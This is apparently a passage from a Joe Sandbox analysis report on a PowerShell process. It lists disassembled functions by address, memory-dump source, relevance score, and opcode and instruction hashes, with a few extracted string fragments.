                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 406dd828e2da85d9dbd27a99c44f0366098d202111c45533e0af687def7a96e8
                                • Instruction ID: d77d2eedd4ba2a3690f88857a1d2f3f4f01fb60195b062662d7392fe81ca1edf
                                • Opcode Fuzzy Hash: 406dd828e2da85d9dbd27a99c44f0366098d202111c45533e0af687def7a96e8
                                • Instruction Fuzzy Hash: D8F037397001148FCB00DBADD9406697BA6EBCD66571545A5D549CB329DF34EC024B91
                                Function 04E790E8 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 759eededf40d0c622d78ebbecb4933a2259cd3145455702e0a232c018cc754ca
                                • Instruction ID: a5229ab9402f5b63ecfd80f30822369e0be5e74d5194a3009c91c3397a6dd15c
                                • Opcode Fuzzy Hash: 759eededf40d0c622d78ebbecb4933a2259cd3145455702e0a232c018cc754ca
                                • Instruction Fuzzy Hash: 5DF0E2356042044BE704FB65C0083AB7BE6EFC0718F10816EC90A5B384DE396806CBE1
                                Function 04E79158 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0931eb19feadc1053d102e93a33a7b621121bd8a40718f20b206be68f7a59b2
                                • Instruction ID: 94134ec4ab09e5a20aa2156263eccef213313f1e32990a4577100bbeaf1be78c
                                • Opcode Fuzzy Hash: c0931eb19feadc1053d102e93a33a7b621121bd8a40718f20b206be68f7a59b2
                                • Instruction Fuzzy Hash: EAF0907060D3905FD766EB78949838A7FA1EB46310F1444AED54ECB282CB386881CB50
                                Function 04E7DC88 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9373f6ac614aff4a22f3f54ba4c003eb4f97ca7fafe8c5f54a128ca2496a8de
                                • Instruction ID: 6a64de956472c80a9dd2a2f4bfc528e7d41bce4f0bf38daeef319e2511b50711
                                • Opcode Fuzzy Hash: c9373f6ac614aff4a22f3f54ba4c003eb4f97ca7fafe8c5f54a128ca2496a8de
                                • Instruction Fuzzy Hash: F6F0A03524A6916FC307972DAC10C9F7FA69EC217131944AED04ACF256CA54D80AC7E6
                                Function 04E7DE48 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e399e22164b3e4df1aae0357e4758c6c4fc9195c6112a350ef0f9a0767ffd32
                                • Instruction ID: a8d24dc2d1446903750ca1fac960a8d9dd2a936229c12b399faddf8d135bb508
                                • Opcode Fuzzy Hash: 1e399e22164b3e4df1aae0357e4758c6c4fc9195c6112a350ef0f9a0767ffd32
                                • Instruction Fuzzy Hash: 39E01A357002108F83109F1DD898C66B7FAEFCE76971910AAE589CB335DA61EC01CB90
                                Function 04E79542 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 46680f19d2aa19d86152fefbded95e5bacce4fa5ebbbcdd0f1717f62cb6fe638
                                • Instruction ID: 463c617adc674bde17c5de79efb6ae25e2772955a61239dab348632c7945df48
                                • Opcode Fuzzy Hash: 46680f19d2aa19d86152fefbded95e5bacce4fa5ebbbcdd0f1717f62cb6fe638
                                • Instruction Fuzzy Hash: A7E0922174A2E11ADB56A2BD28146AE6ED94FC217970900BED945CB253D8448C0283A2
                                Function 04E7C33F Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a608db276e722ce64aa9f4f3d55213f09a6f154493058e0ea7332c887b79905f
                                • Instruction ID: 75afb60da723070bd6cc0aceb0f70284b93c76e621ac0b7ed00fae68fe8226e2
                                • Opcode Fuzzy Hash: a608db276e722ce64aa9f4f3d55213f09a6f154493058e0ea7332c887b79905f
                                • Instruction Fuzzy Hash: 34E0D8367051115FD3249279A494AFBBBEADBC4374F24407ED50AC73D1E961D802C750
                                Function 04E7DCD9 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25a3ad27ead28d1b37971323538e1d7e883366900da439d49ce8118697ff31ed
                                • Instruction ID: e8aa41d873ea383b691d814910c455fafbeb50ce6224a0adaead4ee12fca52ba
                                • Opcode Fuzzy Hash: 25a3ad27ead28d1b37971323538e1d7e883366900da439d49ce8118697ff31ed
                                • Instruction Fuzzy Hash: CCE0E531B00050ABCB098668D8008EDBB66EFC9220F04807EE506AB241DA215416D6E0
                                Function 04E7896A Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1552330ba4be17872fabc12730b26c3ee5c1dc8ca19cc4df183944a424a2f160
                                • Instruction ID: 58aafaf30b5fa510974a8fb3751505e7b317295299d2b90bee7b1f2dd2bc572b
                                • Opcode Fuzzy Hash: 1552330ba4be17872fabc12730b26c3ee5c1dc8ca19cc4df183944a424a2f160
                                • Instruction Fuzzy Hash: 54F0823430D2915BCB0AB77494185AE7F719BC1224F0800AFD505CB283CF284806C796
                                Function 04E7CB68 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e4f19f17c24355ba9e61aca693d10571af40c8ee2de832148cc05def55a1c8c6
                                • Instruction ID: e930b3aa792f925f87f0a55c8b228461a84301e94dd272ccbcb8f6ad75031689
                                • Opcode Fuzzy Hash: e4f19f17c24355ba9e61aca693d10571af40c8ee2de832148cc05def55a1c8c6
                                • Instruction Fuzzy Hash: 61E0D8352043001B8118F65EAC4282EBADEDEC4161754483DD10EAB614DE386C0583B4
                                Function 04E79168 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f4841b8eee457f4526716e197d2c7862f32699f8708bfa5ab6f7e9f5855fe15
                                • Instruction ID: 952d224c547057fb2d1d8adb3abc4dbcaffc53b0efa848fc9932bc6b40292373
                                • Opcode Fuzzy Hash: 8f4841b8eee457f4526716e197d2c7862f32699f8708bfa5ab6f7e9f5855fe15
                                • Instruction Fuzzy Hash: 86F06D70A043044FD760EFB9D49C39ABBE5EB44320F10446DD50ED7340DB396881CB90
                                Function 04E7AF88 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d840f72fb9ee26c20680c5ca9650056c83cbb8713526ebd424632ca79aae947
                                • Instruction ID: c7cb6a4b25ae69e415c16036fc08b6b8c63c7b431e4426cecf4011f2cb35658a
                                • Opcode Fuzzy Hash: 1d840f72fb9ee26c20680c5ca9650056c83cbb8713526ebd424632ca79aae947
                                • Instruction Fuzzy Hash: 0FE0862634D2D11E5B5B913E642046E6FB38AC713130E80FAD084CB253C8518C068395
                                Function 04E78978 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a82ee30120671a21f1b9d6672d77cfa9a5c69b0f24f8d4c1f412a9d2291ea2ea
                                • Instruction ID: bf98415e73942d424521045e9cd80f97bf020cb94d236c3fb2a693b2c1a1b2e1
                                • Opcode Fuzzy Hash: a82ee30120671a21f1b9d6672d77cfa9a5c69b0f24f8d4c1f412a9d2291ea2ea
                                • Instruction Fuzzy Hash: 5AE0863570C71457DF09BBB5A41C2AEBA56EBC4729F04002ED60A8B341CF796906C7DA
                                Function 04E79550 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd5b84e1a3ca52c0066b1a73a98918bd5159e79e5f6dbda828a9325d20a8de4f
                                • Instruction ID: ada6881cf8aa7b0c37e150b18d488ae1824c385b74b3101038ca1bd281bd4630
                                • Opcode Fuzzy Hash: bd5b84e1a3ca52c0066b1a73a98918bd5159e79e5f6dbda828a9325d20a8de4f
                                • Instruction Fuzzy Hash: D4D05E52B01261176A54B2BA28147BBA9CE9FC55BA70510369E09C7242FC44EC0143F1
                                Function 04E7DCE8 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction ID: 4e7b85bd1dee46a0e4209f17eebcba2a70649feb182be870806895284f3a277a
                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction Fuzzy Hash: 52E08631B1001497CB089959D8108EDF7AADFCC220F04C07AD91AA7340DA32691586E1
                                Function 04E7DC98 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8158771cf40bea754b06f6bf4b5fd86b423a7ddb60f2c7576aba63d253604cb
                                • Instruction ID: f4ec87e06967a5e8406fe9ed4a89dc8a10422f45c540be3e50e188f7f6edafc2
                                • Opcode Fuzzy Hash: a8158771cf40bea754b06f6bf4b5fd86b423a7ddb60f2c7576aba63d253604cb
                                • Instruction Fuzzy Hash: 67E08C357446151B8615AA5EA81085F7AAADFC4672320442EE0099B304DE64E8058BE9
                                Function 04E7F460 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5dc2725795e9753e19df56d0dd6a212789543e830d5df13a41c19cf6f3d2ae3
                                • Instruction ID: b1917c77eb410850059abf027b42324e4b2bb648eae2565ab6463990b905901a
                                • Opcode Fuzzy Hash: c5dc2725795e9753e19df56d0dd6a212789543e830d5df13a41c19cf6f3d2ae3
                                • Instruction Fuzzy Hash: C4E09270E011469FC784DFB8C84115EFFF0AF46200B5484EEC808DB606E6314511CB91
                                Function 04E7C580 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 066e894a32614c2e0bf34ccac2eaa1c5eaf159d401a1ee7f4d1fb24ab9cb9105
                                • Instruction ID: b5cc02ad593815a3158d77e49bcf47cb7005ef78c637e70d39161cfe8c133f4b
                                • Opcode Fuzzy Hash: 066e894a32614c2e0bf34ccac2eaa1c5eaf159d401a1ee7f4d1fb24ab9cb9105
                                • Instruction Fuzzy Hash: F5E0863570E1601F8746B77DA91446DBFE1DBD665131800BFE149C7282DA158C05C7A5
                                Function 04E78800 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70a878e13730bd1893322a429b4ab19c82e4318a376ef17ead041a26bac8502b
                                • Instruction ID: a884b62f67ce3a11acb7cf6b1b75b5363913edacea0d1560c55a29c3a4063e5d
                                • Opcode Fuzzy Hash: 70a878e13730bd1893322a429b4ab19c82e4318a376ef17ead041a26bac8502b
                                • Instruction Fuzzy Hash: C0E09230A4D2875FCB49FBB8D40686FBFB1EB45210B1441BDD909CB243D3205806CBC1
                                Function 04E78739 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93d2a1480dc71c2a0ee82e0106f1784567fd7bb36cc394fc342d7c37f14ceec0
                                • Instruction ID: c2cf42c24e52abcb66ac04ec562dbbdc21fc2da92ee534382728dc8eb78fd839
                                • Opcode Fuzzy Hash: 93d2a1480dc71c2a0ee82e0106f1784567fd7bb36cc394fc342d7c37f14ceec0
                                • Instruction Fuzzy Hash: 5CE04F31A0C0868BCF4EFBB4D8594FDBF30EA15311B50449DD55397092EB21194ACBC0
                                Function 04E7C590 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78c0be25d717e9188abac8169433411838d7844bab48bbde8a9234fd9b7ca43f
                                • Instruction ID: 6344fdff59b3a87b628b3e2d6bbb775ea1e8f57ed0e33facc86be0bc4365e800
                                • Opcode Fuzzy Hash: 78c0be25d717e9188abac8169433411838d7844bab48bbde8a9234fd9b7ca43f
                                • Instruction Fuzzy Hash: D9D0A7367091241B4605775DB50545977E9DBC9962310007FE60DC3340DE219C01C3E8
                                Function 04E7F470 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction ID: a46b8283878a8dc4519bb54e42c252e70374a9a0fb4322dac3c6affe189d9757
                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction Fuzzy Hash: 08D06270D042099F8780DFADC94156DFBF4EB48210F5085AAC919D7301F7315612CBD1
                                Function 04E78748 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44260d69d434aef2db9d4e0a5e1a5a4771894d27950fc5f0be694c13e52460e9
                                • Instruction ID: 3f6b8b145f96f9144484740035eff0fd62ec5f1e7b30dfa12f9eaf9e11f8ac19
                                • Opcode Fuzzy Hash: 44260d69d434aef2db9d4e0a5e1a5a4771894d27950fc5f0be694c13e52460e9
                                • Instruction Fuzzy Hash: CFD0173080C1098BCF4CFBE4E81A4BDBB34FB10301F50056DD91792191EA302A4ACBC0
                                Function 04E78810 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5999775a7c82ee5983c013de3c567869e7fe78afae68772ae7762b767d03d52b
                                • Instruction ID: 20e1ce81cee241efe588d3108151a6101160554c6049e1eff2ff99c86498082f
                                • Opcode Fuzzy Hash: 5999775a7c82ee5983c013de3c567869e7fe78afae68772ae7762b767d03d52b
                                • Instruction Fuzzy Hash: 37D01730E0C20A8BCB58FFA4E44A86EBBB5EB44200F104169DE0993341EA306D01CBC1
                                Function 04E7791A Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed462448ef108d5455448f0e938960909e4da77a5071afabac2d84bdd2519369
                                • Instruction ID: 6e2ec88a321d7cf5722ecc7431441fe3a0802baf2065648bacfe0311798d3bb1
                                • Opcode Fuzzy Hash: ed462448ef108d5455448f0e938960909e4da77a5071afabac2d84bdd2519369
                                • Instruction Fuzzy Hash: A3D01274548384BBDB155F7890C4A063F51AB56215B2085DDD88A1A697C93AC84ACF01
                                Function 04E77E90 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c14d4f1061ffd3752a993e232045587186b4ee182eed5312412826e00924434
                                • Instruction ID: c9b641b90dad00f443cb807496c31e081521ab6570816096c42a270c3ddba008
                                • Opcode Fuzzy Hash: 2c14d4f1061ffd3752a993e232045587186b4ee182eed5312412826e00924434
                                • Instruction Fuzzy Hash: 9BC08C565081800BEF09D23044146066E221B83100B0A80A880828B8C0CC648806CA02
                                Function 04E77928 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 640e2af1f478a324d6f651b7a15dd923054b1a70a311ae7737d43f0a3e4edfd7
                                • Instruction ID: 7915c085d434c694f5731fe28d6d6ab0b445b465002d0c2e6151dd0c5df6cbe0
                                • Opcode Fuzzy Hash: 640e2af1f478a324d6f651b7a15dd923054b1a70a311ae7737d43f0a3e4edfd7
                                • Instruction Fuzzy Hash: 46B092300447089FC2486F79A404A157329EB4521A39044ECE90E0A3928E36E889CE45

                                Non-executed Functions

                                Function 07BC0FB8 Relevance: 11.4, Strings: 9, Instructions: 184COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-810355167
                                • Opcode ID: cc388fbb26cef57654878a69b785f39eec4599b0d69e5e15afbe0244f20028d5
                                • Instruction ID: 283cd07c506fa2435789327a197aba6c0ab5c0d7e6c4f5e334653bcc06beec75
                                • Opcode Fuzzy Hash: cc388fbb26cef57654878a69b785f39eec4599b0d69e5e15afbe0244f20028d5
                                • Instruction Fuzzy Hash: 976149F0A1420EDBFB24CE4CC544BAA77B6EB45755F24C0D9E801AB292C735DD84CBA1
                                Function 07BC3928 Relevance: 10.3, Strings: 8, Instructions: 322COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-1910532044
                                • Opcode ID: 08b5d1e6624c438182a83d041460c39a8914ae361026788ce844af6a3944e019
                                • Instruction ID: ffec776b4ec26254cc33f54b0dc531423e26af530fce75aa3ccb0fafee8a333c
                                • Opcode Fuzzy Hash: 08b5d1e6624c438182a83d041460c39a8914ae361026788ce844af6a3944e019
                                • Instruction Fuzzy Hash: D6A179F13043559FE724DB68980076BBBE5EFC6610F58C4EEE446DB291CA31C845C7A2
                                Function 07BC1BE0 Relevance: 9.2, Strings: 7, Instructions: 408COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$pij$tP]q$tP]q
                                • API String ID: 0-532307603
                                • Opcode ID: 4322cc7a33844fe159aeea8281dcf78c375880c237d507a6ced879b3856e755f
                                • Instruction ID: ef24cc66fd41dcacd05db342435857ddf52b147f425594285393f2bc95b2c4e1
                                • Opcode Fuzzy Hash: 4322cc7a33844fe159aeea8281dcf78c375880c237d507a6ced879b3856e755f
                                • Instruction Fuzzy Hash: 5FD147F1B0420E8FE725CB6C94006AABBA6EF81311F18C4EFD955EB256DB35C845C7A1
                                Function 04E7EBB8 Relevance: 8.9, Strings: 7, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,aq$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-770108497
                                • Opcode ID: 89f4aa8fdacb8db25d5e0152533c592820980e38771139b4e4cee527ddf66c61
                                • Instruction ID: b499f5e4ba369551b87a1aa7644f7d32815cb56258cdde6c594007d9d2835899
                                • Opcode Fuzzy Hash: 89f4aa8fdacb8db25d5e0152533c592820980e38771139b4e4cee527ddf66c61
                                • Instruction Fuzzy Hash: 0D5191303844108FCB29AB7D896497C3BDBAF8DBA431054EAE516CB375EE58EC40C762
                                Function 07BC0488 Relevance: 6.7, Strings: 5, Instructions: 499COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$4']q$4']q$4']q$4']q
                                • API String ID: 0-2283484764
                                • Opcode ID: 379e3951d03f41c5ea04bb2f1538c65247585bb15142932f78cc779bf8b7744f
                                • Instruction ID: d6f00ea4fa0631f1cffdace7beccc0c286f158f31b82c94b4b9f92d23ae4a3b4
                                • Opcode Fuzzy Hash: 379e3951d03f41c5ea04bb2f1538c65247585bb15142932f78cc779bf8b7744f
                                • Instruction Fuzzy Hash: 7FF155B1704245CFD725EA6898107AABBA6EFC1210F14C4FFD545CF292DA35C946CBA2
                                Function 07BC3678 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                • API String ID: 0-2353078639
                                • Opcode ID: 5c7c695648491f2569141ac6741852e34ba5a243a90890a03bd56d979e8f2e82
                                • Instruction ID: e15b0af3833949e8e04ac09c818f4814a8c975e4ddb794a9ec579f6fc9390f9c
                                • Opcode Fuzzy Hash: 5c7c695648491f2569141ac6741852e34ba5a243a90890a03bd56d979e8f2e82
                                • Instruction Fuzzy Hash: FE5187F17043068FEB24DA298905A66BBE6EFC2610FA4C0BFD845C7251DA35C845CBA3
                                Function 04E7EDE8 Relevance: 5.5, Strings: 4, Instructions: 453COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `Q]q$$]q$$]q$$]q
                                • API String ID: 0-3648917406
                                • Opcode ID: 3f155b785471cff0b810b490485b32db5de2d58357f0341988ee732111adcc1c
                                • Instruction ID: e9803089fcd7f7331cc76f81baf23359a7b665b7fc8d0efb9fd4d36e8685f49c
